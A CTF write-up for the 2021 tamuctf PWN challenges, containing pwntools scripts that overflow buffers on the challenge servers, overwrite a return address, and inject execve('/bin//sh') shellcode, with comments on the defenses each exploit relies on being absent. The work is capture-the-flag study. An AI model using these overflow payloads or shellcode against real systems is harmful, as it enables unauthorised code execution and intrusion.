CTF-Writeup
2021 tamuctf Writeup
Rasser
2021. 9. 17. 00:42
PWN
warmup
# warmup: connect to the challenge service, answer the name prompt with an
# over-long string, then hand the session to the terminal.
from pwn import *

conn = remote('194.5.207.56', 7000)

# 80 filler characters. Presumably this is longer than the buffer the service
# reads the name into; the target's source is not shown on this page, so the
# buffer size and what the excess bytes overwrite are unconfirmed. On the
# service side, a length-bounded read of the name is the check that would
# make this input harmless.
conn.sendlineafter('name:', "A" * 80)

conn.interactive()
Babypwn
# Babypwn: two prompts, two over-long answers, then an interactive session.
from pwn import *

io = remote('194.5.207.56', 7010)
target_addr = 0x4012ec

# Answer to the 'name: ' prompt: 0x1c filler bytes followed by the value
# 0xcafe packed into 8 bytes. Presumably the service compares a variable
# placed after the name buffer against 0xcafe; the binary is not shown here,
# so that layout is an assumption.
first_answer = b"A" * 0x1c + p64(0xcafe)
io.sendlineafter('name: ', first_answer)

# Answer to the second prompt: 128 + 8 filler bytes, then a fixed code address.
# NOTE(review): a hard-coded 0x4012ec only stays valid if the binary is loaded
# at a fixed base, and reaching a saved return address this way presumably
# means there is no stack protector in between. Building with PIE and
# -fstack-protector, plus a bounded read, are the defenses this relies on
# being absent (to be confirmed against the binary).
second_answer = b"".join([b"B" * 128, b"C" * 8, p64(target_addr)])
io.sendlineafter(b';;)', second_answer)

io.interactive()
canary(이건 못품)
작성했던 코드
# Unfinished attempt at the "canary" challenge (the heading above says it was
# not solved). It runs against a local copy of the binary with gdb attached,
# not against the remote service.
from pwn import *
p = process('./canary')  # local process started from the current directory
e = ELF('./canary')      # parsed here but not referenced again in this script
gdb.attach(p)            # attach a debugger to the running process
# 23 bytes of x86-64 Linux machine code: the embedded bytes 2f 62 69 6e 2f 2f
# 73 68 spell "/bin//sh", and the tail loads 0x3b (execve) before `syscall`.
# NOTE(review): this is a str literal while the later payload is bytes; on
# Python 3 pwntools has to encode a str before sending it.
shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
# Both of the first two prompts end in 'chars): '; the first receives the
# machine code, the second receives 16 filler characters.
p.sendlineafter('chars): ', shellcode)
p.sendlineafter('chars): ', "A"*16)
# Read the hexadecimal value the program prints after 'address: '.
p.recvuntil('address: ')
# NOTE(review): the parsed value is stored in `canary`, but the next line uses
# it as a base address (value + 0xc), not as a stack-canary value. The name is
# misleading.
canary = int(p.recvuntil('\n')[:-1], 16)
shell = canary + 0xc
# Final input: 0x14 filler bytes followed by the computed address, 8 bytes.
# NOTE(review): the approach presumably depends on the program disclosing an
# address and on the memory holding the earlier input being executable. The
# binary is not shown on this page, so neither can be confirmed; a
# non-executable stack/data mapping would defeat it.
payload = b"B"*0x14
payload += p64(shell)
p.sendlineafter('number: ', payload)
# Pause so the debugger can be inspected before going interactive.
# raw_input() exists only on Python 2.
raw_input()
p.interactive()
